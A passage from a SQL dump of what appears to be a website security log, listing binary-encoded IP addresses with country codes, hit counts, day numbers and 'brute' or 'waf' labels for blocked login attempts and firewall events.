','TW',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ݵ�','TW',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ގs','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ߧ9','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��N','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��N','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��N','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�^_','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�^_','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�\'','US',2,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��v','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�','TW',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�1�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�1�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�1�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�1�','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�1�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�1�','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�1�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�K','TW',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�K','TW',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�K','TW',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��#���','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��$Y�i','ID',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��$\\','ID',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��$\\','ID',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��$\\','ID',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��$\\','ID',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��$\\','ID',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��%\0','NL',2,18871,'waf'),('\0\0\0\0\0\0\0\0\0\0��%ۿ','NL',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��%ۿ','NL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��%ۿ','NL',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��%��','UA',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��%;J�','FR',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�\r�','NL',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�\r�','NL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��%���','IR',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��%���','IR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��%���','IR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�','FR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�','FR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�[','FR',2,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��%���','FR',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��%���','FR',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��%�ƴ','UA',2,18855,'waf'),('\0\0\0\0\0\0\0\0\0\0��%�ƴ','UA',2,18856,'waf'),('\0\0\0\0\0\0\0\0\0\0��\'gI�','CN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��\'gI�','CN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��\'ji&','CN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��\'l\0�','CN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��(E��','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��(E��','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��(W\n','US',6,18883,'waf'),('\0\0\0\0\0\0\0\0\0\0��(r��','NL',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��(r��','NL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��(z��','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��(z��','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��(z��','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��)]R','TZ',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��)]R','TZ',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��)�','ZA',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��)�H�','LY',2,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��)�$','TN',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��*��','CN',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��*��','CN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��+���','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��+���','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��+���','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��+���','SG',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��+�Ԟ','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��+�Ԟ','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��+���','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��+�T�','SG',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��+�%','HK',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��+�FK','IN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��+�','HK',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��- 9','SC',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��-7<n','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��-7<n','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��-=��','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��-=��','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��-=��','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��-=��','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��->�o','CA',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��-@6�','HK',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��-@6�','HK',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��-@6�','HK',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��-@6�','HK',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��-MC�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��-M�.','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��-O3E','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��-O�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��-P�0','TR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��-P�0','TR',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��-P�0','TR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��-]��','IR',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��-v�W','VN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��-v�W','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��-v�W','VN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��-v�W','VN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��-v�W','VN',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wQ�','VN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wS�','VN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wS�','VN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wS�','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wS�','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wT�','VN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wT�','VN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wT�','VN',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wT�','VN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��-w��','VN',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��-xEy','KR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��-xEy','KR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��-xEy','KR',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��-|T(','VN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�k�','UA',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��9','SE',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��^','SE',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��^','SE',3,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��^','SE',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��^','SE',2,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��-���','SE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��-���','SE',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��-���','SE',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��-���','SE',2,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0��-���','SE',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0��-���','SE',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��-���','SE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��-���','SE',2,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�c','TR',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�c','TR',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�M^','IR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�M^','IR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','TR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','TR',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','TR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','TR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','TR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','TR',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','TR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��-���','NL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�A*','HK',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�A*','HK',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�A*','HK',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��.V<�','DE',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��.est','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��.est','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e�G','DE',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e�\"','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e��','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��.i|b','FR',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��.��','RU',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��.���','RU',6,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�yo','UA',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�yo','UA',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�yo','UA',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�yo','UA',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�`S','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��.��','BY',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��/4�*','HK',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��/J�','JP',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��/J�','JP',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��/J�','JP',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��/J�','JP',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��/[+�','AU',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��/[+�','AU',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��/[+�','AU',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��/]F','CN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��/aP3','CN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��/aP3','CN',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��/aP3','CN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��/d�?','CN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��/i=#','CN',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��/jv�','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��/jv�','CN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��/jɆ','CN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��/jɆ','CN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��/jɆ','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��/r�','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��/r�','CN',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��/r�','CN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��/r�','CN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��/r�','CN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��/r�','CN',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��/sM�','CN',2,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��/sM�','CN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��/sM�','CN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��/sM�','CN',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�\'','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�\'','SG',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��/��','SG',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��/��','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�=�','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��/� ','CN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�','CN',2,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�','CN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�','CN',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�','CN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�','CN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',2,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',3,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','MY',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','MY',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��1���','AU',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��1���','AU',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��1��E','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��1��E','CN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��2��','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��2tb','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��3\rH�','NO',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��3\rH�','NO',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��3','NL',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��3��','FR',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��3��','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��3D(','FR',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��3D(','FR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Dx�','FR',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Dx�','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��3KR','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Kȷ','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Kȷ','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Kȷ','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Kȷ','FR',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��3M�\"','FR',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��3O','CA',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��3O�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��3QJ','US',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Q�x','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Q�x','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Y��','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Y��','GB',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��3[{�','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��3� ','GB',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�8�','FR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�8�','FR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�8�','FR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�8�','FR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�]','CA',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�\"o','CA',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�Sq','FR',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��3ðP','FR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��3���','FR',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��4$��','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��4N�}','KR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�@�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��4���','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�w%','SG',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�','SG',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�','SG',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�J�','US',1,18880,'waf'),('\0\0\0\0\0\0\0\0\0\0��6$��','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��6%','GB',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��6%','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��6&.�','FR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'�','CA',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'�','CA',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'1�','CA',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'1�','CA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'1�','CA',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'1�','CA',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��6��-','SG',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��6��-','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��6��-','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��6�%�','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��6�%�','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��:x�','KR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��','HK',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',2,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��<�','JP',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��=�','IN',1,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��=C�','IN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��=C�','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��=C�','IN',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��=C�','IN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��=C�','IN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��=C�','IN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��=C�','IN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��=��','VN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��=o�$','KR',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��=o�$','KR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��=o�$','KR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��=�F�','HK',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��=�F�','HK',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��>q�','PT',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��>q�','PT',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','PT',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�','PT',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�','PT',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�','PT',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��>K�','FR',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��>m\\','RU',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��>m\\','RU',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��>m\\','RU',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��>q�1','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��>���','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��>���','DE',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��G','DE',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��G','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��G','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��G','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��q','DE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','DE',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�a','FR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�q�','FR',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�ra','FR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�zJ','FR',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�zJ','FR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�zJ','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��>Ҵ�','FR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','FR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','FR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','FR',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','FR',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','FR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�d�','IR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','NL',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','NL',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','NL',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','NL',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','CN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��?�)','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��?�)','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��?�)','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��?�)','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��?�)','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��?�)','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��?�)','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��?�)','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z(d','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z(d','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z(d','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0�','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��@om�','US',1,